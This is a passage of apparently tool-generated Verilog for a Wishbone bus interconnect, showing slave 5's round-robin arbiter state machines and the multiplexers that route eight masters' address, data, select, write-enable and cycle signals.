                    if ( s5_msel_arb2_req[6] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[7] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[0] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[1] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[2] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[3] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb2_grant5:
        begin
            if (  !( s5_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[6] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s5_msel_arb2_req[7] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[0] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[1] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[2] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[3] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[4] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb2_grant6:
        begin
            if (  !( s5_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[7] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s5_msel_arb2_req[0] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[1] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[2] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[3] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[4] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[5] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb2_grant7:
        begin
            if (  !( s5_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[0] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s5_msel_arb2_req[1] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[2] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[3] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[4] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[5] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[6] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s5_msel_arb3_req = { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd3 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd3 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd3 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd3 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd3 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd3 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd3 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s5_msel_arb3_state <= s5_msel_arb3_grant0;
        end
        else
        begin 
            s5_msel_arb3_state <= s5_msel_arb3_next_state;
        end
    end
    always @ (  s5_msel_arb3_state or  { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd3 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd3 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd3 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd3 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd3 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd3 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd3 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s5_msel_arb3_next_state = s5_msel_arb3_state;
        case ( s5_msel_arb3_state ) 
        s5_msel_arb3_grant0:
        begin
            if (  !( s5_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[1] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[2] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[3] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[4] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[5] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[6] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[7] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb3_grant1:
        begin
            if (  !( s5_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[2] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[3] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[4] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[5] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[6] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[7] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[0] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb3_grant2:
        begin
            if (  !( s5_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[3] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[4] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[5] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[6] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[7] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[0] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[1] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb3_grant3:
        begin
            if (  !( s5_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[4] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[5] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[6] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[7] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[0] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[1] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[2] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb3_grant4:
        begin
            if (  !( s5_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[5] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[6] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[7] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[0] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[1] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[2] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[3] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb3_grant5:
        begin
            if (  !( s5_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[6] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[7] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[0] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[1] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[2] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[3] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[4] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb3_grant6:
        begin
            if (  !( s5_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[7] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[0] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[1] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[2] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[3] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[4] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[5] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb3_grant7:
        begin
            if (  !( s5_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s5_msel_arb3_req[0] ) 
                begin
                    s5_msel_arb3_next_state = s5_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s5_msel_arb3_req[1] ) 
                    begin
                        s5_msel_arb3_next_state = s5_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s5_msel_arb3_req[2] ) 
                        begin
                            s5_msel_arb3_next_state = s5_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s5_msel_arb3_req[3] ) 
                            begin
                                s5_msel_arb3_next_state = s5_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s5_msel_arb3_req[4] ) 
                                begin
                                    s5_msel_arb3_next_state = s5_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb3_req[5] ) 
                                    begin
                                        s5_msel_arb3_next_state = s5_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb3_req[6] ) 
                                        begin
                                            s5_msel_arb3_next_state = s5_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s5_msel_pri_out or  s5_msel_arb0_state or  s5_msel_arb1_state)
    begin
        if ( s5_msel_pri_out[0] ) 
        begin
            s5_msel_sel1 = s5_msel_arb1_state;
        end
        else
        begin 
            s5_msel_sel1 = s5_msel_arb0_state;
        end
    end
    always @ (  s5_msel_pri_out or  s5_msel_arb0_state or  s5_msel_arb1_state or  s5_msel_arb2_state or  s5_msel_arb3_state)
    begin
        case ( s5_msel_pri_out ) 
        2'd0:
        begin
            s5_msel_sel2 = s5_msel_arb0_state;
        end
        2'd1:
        begin
            s5_msel_sel2 = s5_msel_arb1_state;
        end
        2'd2:
        begin
            s5_msel_sel2 = s5_msel_arb2_state;
        end
        2'd3:
        begin
            s5_msel_sel2 = s5_msel_arb3_state;
        end
        endcase
    end
    assign s5_mast_sel = ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s5_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s5_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s5_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s5_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s5_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s5_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s5_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s5_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s5_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s5_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s5_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s5_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s5_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s5_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s5_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s5_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s5_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s5_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s5_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s5_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s5_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s5_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s5_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s5_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s5_m0_data_o = s5_data_i;
    assign s5_m1_data_o = s5_data_i;
    assign s5_m2_data_o = s5_data_i;
    assign s5_m3_data_o = s5_data_i;
    assign s5_m4_data_o = s5_data_i;
    assign s5_m5_data_o = s5_data_i;
    assign s5_m6_data_o = s5_data_i;
    assign s5_m7_data_o = s5_data_i;
    always @ (  ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s5_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s5_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s5_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s5_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s5_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s5_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s5_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s5_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s5_m0_cyc_r <= m0_s5_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s5_m1_cyc_r <= m1_s5_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s5_m2_cyc_r <= m2_s5_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s5_m3_cyc_r <= m3_s5_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s5_m4_cyc_r <= m4_s5_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s5_m5_cyc_r <= m5_s5_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s5_m6_cyc_r <= m6_s5_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s5_m7_cyc_r <= m7_s5_cyc_o;
    end
    always @ (  ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) or  m0_s5_cyc_o or  m1_s5_cyc_o or  m2_s5_cyc_o or  m3_s5_cyc_o or  m4_s5_cyc_o or  m5_s5_cyc_o or  m6_s5_cyc_o or  m7_s5_cyc_o or  s5_m0_cyc_r or  s5_m1_cyc_r or  s5_m2_cyc_r or  s5_m3_cyc_r or  s5_m4_cyc_r or  s5_m5_cyc_r or  s5_m6_cyc_r or  s5_m7_cyc_r)
    begin
        case ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s5_wb_cyc_o = ( m0_s5_cyc_o & s5_m0_cyc_r );
        end
        3'd1:
        begin
            s5_wb_cyc_o = ( m1_s5_cyc_o & s5_m1_cyc_r );
        end
        3'd2:
        begin
            s5_wb_cyc_o = ( m2_s5_cyc_o & s5_m2_cyc_r );
        end
        3'd3:
        begin
            s5_wb_cyc_o = ( m3_s5_cyc_o & s5_m3_cyc_r );
        end
        3'd4:
        begin
            s5_wb_cyc_o = ( m4_s5_cyc_o & s5_m4_cyc_r );
        end
        3'd5:
        begin
            s5_wb_cyc_o = ( m5_s5_cyc_o & s5_m5_cyc_r );
        end
        3'd6:
        begin
            s5_wb_cyc_o = ( m6_s5_cyc_o & s5_m6_cyc_r );
        end
        3'd7:
        begin
            s5_wb_cyc_o = ( m7_s5_cyc_o & s5_m7_cyc_r );
        end
        endcase
    end
